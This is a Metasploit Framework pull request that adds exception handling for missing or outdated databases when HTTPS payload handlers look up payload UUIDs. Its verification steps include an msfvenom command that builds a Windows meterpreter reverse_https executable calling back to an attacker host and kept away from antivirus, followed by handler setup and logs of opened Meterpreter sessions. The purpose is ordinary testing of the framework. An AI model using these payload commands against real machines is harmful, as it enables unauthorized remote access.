### PR TITLE
Fix https payload db exception

### DIFF
--- a/lib/msf/core/handler.rb
+++ b/lib/msf/core/handler.rb
@@ -224,16 +224,24 @@ protected
       # Pass along any associated payload uuid if specified
       if opts[:payload_uuid]
         s.payload_uuid = opts[:payload_uuid]
-        payload_info = {
-            uuid: s.payload_uuid.puid_hex,
-            workspace: framework.db.workspace
-        }
-        if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.db.payloads(payload_info).first)
-          s.payload_uuid.registered = true
-          s.payload_uuid.name = uuid_info['name']
-          s.payload_uuid.timestamp = uuid_info['timestamp']
-        else
-          s.payload_uuid.registered = false
+        begin
+          payload_info = {
+              uuid: s.payload_uuid.puid_hex,
+              workspace: framework.db.workspace
+          }
+          if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.db.payloads(payload_info).first)
+            s.payload_uuid.registered = true
+            s.payload_uuid.name = uuid_info['name']
+            s.payload_uuid.timestamp = uuid_info['timestamp']
+          else
+            s.payload_uuid.registered = false
+          end
+        rescue ActiveRecord::ConnectionNotEstablished => e
+          print_error("WARNING: No database connection.  Unable to save payload info.")
+        rescue ::Exception => e
+          # We just wanna show and log the error, not trying to swallow it.
+          print_error("#{e.class} #{e.message}")
+          elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
         end
       end
 

--- a/lib/msf/core/handler.rb
+++ b/lib/msf/core/handler.rb
@@ -238,6 +238,8 @@ protected
           end
         rescue ActiveRecord::ConnectionNotEstablished => e
           print_error("WARNING: No database connection.  Unable to save payload info.")
+        rescue NoMethodError => e
+          print_error("WARNING: Database does not yet support UUIDs.  Unable to save payload info.")
         rescue ::Exception => e
           # We just wanna show and log the error, not trying to swallow it.
           print_error("#{e.class} #{e.message}")


### PR DESCRIPTION
A pull request I landed yesterday (#10675) tested successfully when Metasploit Framework is actively connected to a migrated backend database, but raises an `ActiveRecord::ConnectionNotEstablished` exception with HTTP/HTTPS payloads on older databases or on installations without databases configured.

On an installation without a database, HTTPS callbacks will fail.  It is likely other payloads (especially UUID-enabled payloads) will do the same.  For example:

```
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set LHOST 192.168.199.132
LHOST => 192.168.199.132
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://192.168.199.132:443
[*] https://192.168.199.132:443 handling request from 192.168.199.159; (UUID: nr3xvrg6) Staging x86 payload (180825 bytes) ...
[-] https://192.168.199.132:443 handling request from 192.168.199.159; (UUID: nr3xvrg6) Exception handling request: ActiveRecord::ConnectionNotEstablished
```

## Verification

List the steps needed to make sure this thing works

- [ ] Create an HTTPS payload and keep it safe from AV:
```
msfvenom -p windows/meterpreter/reverse_https -f exe -o /A_SAFE_PLACE/https_cb.exe LHOST=[ATTACK_IP] LPORT=8443
```
- [ ] Copy to a Windows machine (I used Win7 x64).
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/handler`
- [ ] `set PAYLOAD windows/meterpreter/reverse_https`
- [ ] `set LHOST [ATTACK_IP]`
- [ ] `set LPORT 8443`
- [ ] `run`
- [ ] Run the payload on the Windows target.

If you don't have a database attached, you might see:

```
[*] Started HTTPS reverse handler on https://192.168.199.132:443
[*] https://192.168.199.132:443 handling request from 192.168.199.159; (UUID: 0miyiopz) Staging x86 payload (180825 bytes) ...
[-] https://192.168.199.132:443 handling request from 192.168.199.159; (UUID: 0miyiopz) WARNING: No database connection.  Unable to save payload info.
[*] Meterpreter session 1 opened (192.168.199.132:443 -> 192.168.199.159:49211) at 2019-03-05 12:03:25 -0600

meterpreter > 
```

If you have a database attached, but haven't migrated to new `payload` tables with UUID support (for example, when have a `database.yml` file that points to an older database), you might see:

```
[*] Started HTTPS reverse handler on https://192.168.199.132:8443
[*] https://192.168.199.132:8443 handling request from 192.168.199.159; (UUID: uecp4yb9) Staging x86 payload (180825 bytes) ...
[-] https://192.168.199.132:8443 handling request from 192.168.199.159; (UUID: uecp4yb9) WARNING: Database does not yet support UUIDs.  Unable to save payload info.
[*] Meterpreter session 1 opened (192.168.199.132:8443 -> 192.168.199.159:49242) at 2019-03-05 12:23:13 -0600

meterpreter > 
```